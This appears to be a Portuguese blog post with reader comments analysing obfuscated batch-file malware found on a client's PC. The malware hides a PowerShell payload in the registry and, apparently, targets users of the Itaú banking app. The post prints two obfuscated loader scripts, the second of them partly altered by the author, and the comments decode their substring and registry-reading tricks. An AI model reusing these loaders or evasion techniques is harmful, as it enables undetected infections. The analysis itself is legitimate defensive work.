Jefferson, 
08 de julho de 2018, 
Esta semana eu me deparei com um malware usando uma técnica da qual eu sequer tinha ouvido falar. Encontrei na máquina do cliente uma dezena de arquivos com um conteúdo similar a este:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
@Echo off Setlocal EnableExtensions Setlocal EnableDelayedExpansion Set uclu3ixhy=HKCU Set uclu3ixhy=%uclu3ixhy%\Software Set uclu3ixhy=%uclu3ixhy%\Microsoft Set di5bupl2q= FOR /F "usebackq tokens=1,2*" %%1 IN (`REG QUERY %uclu3ixhy%`) DO ( Set hvliceagt=%%11 IF "!hvliceagt:~0,10!"=="w2g6w2cmf-" ( Set di5bupl2q=!di5bupl2q!%%3 ) ) %di5bupl2q% |
Você consegue entender só de olhar esse código o que ele está fazendo? Eu lamento dizer que eu não consegui, porque a partir da linha seguinte ao FOR eu não fazia a mínima idéia do que se passava, mesmo depois de ler o código umas dez vezes. Eu tive que consultar a chave do Registro que ele tentou obfuscar nos primeiros comandos SET (HKCU\Software\Microsoft) para entender que o que esses últimos comandos fazem é montar um script em uma única linha a partir do conteúdo maliciosamente armazenado lá e lido linha por linha pelo comando FOR. Script esse que é executado no final.
O real código do malware estava escondido no Registro, ligeiramente obfuscado. Só consegui entender que parecia se tratar de um script Powershell.
Eu enviei uma amostra do .bat para o Virustotal e nenhum dos 58+ mecanismos antivírus lá pôde detectar o código como malicioso, o que não me surpreendeu. Um humano é capaz de detectar porque pelo nome, localização e conteúdo do .bat fica evidente que o propósito é malicioso, mesmo que você leia 10 vezes o que está escrito e não consiga decifrar o que ele faz. Mas para uma máquina o código realmente deve parecer inofensivo.
Como nenhum antivírus pôde me dar uma pista do que se tratava (e o AVAST estava em execução nessa máquina) e eu não sabia como mandar uma amostra do código oculto no Registro, eu me limitei a apagar o código no Registro e todos os arquivos suspeitos que encontrei criados ou modificados desde a data que eu deduzi para a infecção.
Eu fui então checar o quanto esconder malware no Registro é comum e para minha surpresa desde 2014 existem até modos de fazer isso sem criar nenhum arquivo para chamar atenção. Eu suponho que todos esses métodos usem exploits que já foram eliminados por atualizações do Windows ou são facilmente localizados por antivírus porque senão eu já teria conhecimento dessa praga há muito mais tempo.
O malware também cria outro tipo de .bat, mas como esse é detectado pelo Avira (o único dos mecanismos do Virustotal que o reconhece) eu não posso publicá-lo aqui como texto na integra ou meu blog será marcado como malicioso então vou transcrever uma versão ligeiramente re-obfuscada dele:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
IF NOT EXIST "%LOCALAPPDATA%\A p l i cativo Itau" ( //eu mexi nessa linha goto EXIT; ) @echo off cd %SystemRoot%\System32 set UznjZq= Set UznjZq=%UznjZq%GXCMJeQujkU Set UznjZq=%UznjZq%KpbDEfSz5dr Set UznjZq=%UznjZq%PWIHl09o62q Set UznjZq=%UznjZq%TNOa7Rv4wV8 Set UznjZq=%UznjZq%3mBnyixAhYt Set UznjZq=%UznjZq%FZgsL1c set aa=^| set sistema= Set sistema=%sistema%%UznjZq:~49,1%%UznjZq:~5,1%%UznjZq:~50,1%(%UznjZq:~34,1%%UznjZq:~5,1%%UznjZq:~41,1%-%UznjZq:~35,1%%UznjZq:~13,1%%UznjZq:~8,1%%UznjZq:~5,1%%UznjZq:~61,1%%UznjZq:~54,1% //(deletei 12 linhas com um conteúdo bem parecido com o da linha acima) Set sistema=%sistema%") echo %%sistema%%%aa%%UznjZq:~23,1%%UznjZq:~49,1%%UznjZq:~47,1%%UznjZq:~20,1%%UznjZq:~29,1%%UznjZq:~41,1%%UznjZq:~58,1%%UznjZq:~22,1%%UznjZq:~29,1%%UznjZq:~41,1%%UznjZq:~5,1%%UznjZq:~21,1%%UznjZq:~17,1%%UznjZq:~52,1%%UznjZq:~5,1%%UznjZq:~26,1%%UznjZq:~26,1%\%UznjZq:~39,1%%UznjZq:~60,1%.%UznjZq:~27,1%\%UznjZq:~12,1%%UznjZq:~29,1%%UznjZq:~41,1%%UznjZq:~5,1%%UznjZq:~21,1%%UznjZq:~58,1%%UznjZq:~52,1%%UznjZq:~5,1%%UznjZq:~26,1%%UznjZq:~26,1%.%UznjZq:~5,1%%UznjZq:~50,1%%UznjZq:~5,1% -%UznjZq:~47,1%%UznjZq:~29,1%%UznjZq:~12,1% -%UznjZq:~41,1%%UznjZq:~49,1%%UznjZq:~47,1% %UznjZq:~60,1% - EXIT: |
Você consegue entender o que raios isso faz? Tirando o fato de que não executa se o o Aplicativo Itaú não estiver instalado na máquina e montar uma looonga linha de código obfuscado, não faço a menor idéia, mas o Avira chama de TR/PowerShell.Gen
ja tinha visto, mas não com script powershell
Nunca vi nada parecido, mas gostei do desafio…
Primeiro ele cria uma var que eh um vetor de caracteres chamado UznjZq com o valor:
GXCMJeQujkUKpbDEfSz5drPWIHl09o62qTNOa7Rv4wV83mBnyixAhYtFZgsL1c
Depois ele monta o script ‘sistema’ utilizando índices para cada caractere no vetor. %UznjZq:~49,1% seria a substring de 1 char a partir da posição 49, ou seja, ‘i’.
Traduzindo o começo, temos:
onde iex parece ser ‘Invoke-Expression’ , uma forma de executar comandos.
Obrigado pelo esclarecimento. Eu não fazia idéia de como interpretar o que vinha depois de “UznjZq”. Agora eu percebo que é o método “batch” de obter uma substring.
E sabendo disso, agora eu pude determinar que o conteúdo da variável UznjZq é:
ABCDEFGHIJKLMNOPQRSTUVXWYZabcdefghijklmnopqrstuvwxyz1234567890
mas fora de ordem. Obfuscamento simples e eficaz.
Com relação ao primeiro script, aqui vai meu entendimento/colaboração:
Até a linha 6 é tranquilo, onde é criado a variável de ambiente uclu3ixhy e é atualizada nas linhas 4, 5 e 6, tendo como valor final a string “HKCU\Software\Microsoft”, depois daí realmente fica nebuloso (kkkk), mas vamos lá:
É criado a variável de ambiente di5bupl2q sem valor, que terá seu valor definido dentro do laço FOR.
No laço FOR é executado o comando “REG QUERY %uclu3ixhy%”, (que nesse caso o comando explicito é: REG QUERY HKCU\Software\Microsoft), que tem a finalidade de retornar todas as subchaves da chave “HKCU\Software\Microsoft”.
O parâmetro usebackq é para envolver entre aspas o nome da subchave, com a finalidade de pegar o nome completo dela, mesmo que tenha espaços em branco no nome.
O parâmetro tokens=1,2* faz um split (divide) do nome da subchave encontrada, utilizando os espaços em branco para dividir, e armazena cada parte em variáveis temporárias %1 %2, e por causa do asterisco “*”, será criado, se necessário, as variáveis %3, %4 e assim sucessivamente, conforme a quantidade de espaços em branco
***O comando Set hvliceagt=%%11 armazenará o valor da 11ª parte na variável hvliceagt.
O comando IF “!hvliceagt:~0,10!”==”w2g6w2cmf-“ testa se os 10 primeiros caracteres da variável hvliceagt é igual a string “w2g6w2cmf-“, e caso seja igual, o valor da variável di5bupl2q (que foi criada na linha 7 antes do FOR) irá receber o valor dela mesma (que está em banco), mais o valor da 3ª parte da subchave encontrada (Set di5bupl2q=!di5bupl2q!%%3)
E na última linha o conteúdo da variável di5bupl2q (que eu não faço ideia do que seja) é executado.
***Aqui tem uma curiosidade interessante: caso a subchave encontrada não tenha 11 partes, será armazenado o valor da 1ª parte, concatenada com o número 1
Ex.: subchave encontrada: “HKCU\Software\Microsoft\Active Setup”
Valor que será armazenado na variável hvliceagt: “HKCU\Software\Microsoft\Active1”